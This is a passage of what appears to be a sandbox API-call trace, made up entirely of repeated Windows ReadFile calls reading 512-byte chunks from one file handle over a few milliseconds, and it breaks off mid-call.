[0152.550] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.550] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.550] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.550] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.550] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.550] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.550] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.551] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.551] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.551] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.551] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.551] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.551] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.551] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.551] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.551] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.551] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.551] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.551] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.552] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.552] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.552] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.552] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.552] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.552] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.552] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.552] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.552] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.552] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.552] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.552] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.553] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.553] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.553] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.553] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.553] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.553] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.553] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.553] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.553] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.553] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.553] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.553] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.553] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.553] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.554] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.554] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.554] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.554] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.554] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.554] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.554] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.554] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.554] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.554] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.554] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.554] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.555] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.555] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.555] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.555] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.555] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.555] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.555] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.555] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.555] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.555] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.555] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.555] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.555] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.556] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.556] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.556] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.556] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.556] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.556] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.556] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.556] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.556] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.556] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.556] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.556] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.556] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.557] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.557] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.557] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.557] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.557] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.557] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.557] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.557] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.557] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.557] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.558] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.558] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.558] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.558] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.558] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.558] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.558] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.558] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.558] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.558] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.558] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, 